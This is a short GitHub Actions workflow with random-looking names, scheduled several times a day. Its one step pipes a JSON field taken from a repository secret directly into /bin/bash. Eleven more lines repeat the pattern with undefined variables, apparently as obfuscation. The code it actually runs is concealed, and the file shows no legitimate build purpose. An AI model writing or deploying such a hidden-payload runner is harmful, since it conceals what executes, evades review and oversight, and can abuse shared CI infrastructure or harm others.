name: qiwussq
on:
  workflow_dispatch:
  schedule:
    - cron: '26 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiwussq
        env:
          yyseh07: ${{ secrets.yyseh07 }}
        run: |
          echo $yyseh07 | jq -r .rvo1 | /bin/bash
          echo $pnag2 | jq -r .kebe97 | /bin/bash
          echo $l93 | jq -r .z3950 | /bin/bash
          echo $zn079 | jq -r .vmi94 | /bin/bash
          echo $ger1 | jq -r .d057 | /bin/bash
          echo $l594 | jq -r .q60702 | /bin/bash
          echo $fmd8 | jq -r .bpaf29 | /bin/bash
          echo $zpfgi51483 | jq -r .evjyn08457 | /bin/bash
          echo $rqz72158 | jq -r .smaf08 | /bin/bash
          echo $b71 | jq -r .tuer95571 | /bin/bash
          echo $nls25 | jq -r .k947 | /bin/bash
          echo $ah1387 | jq -r .r1941 | /bin/bash

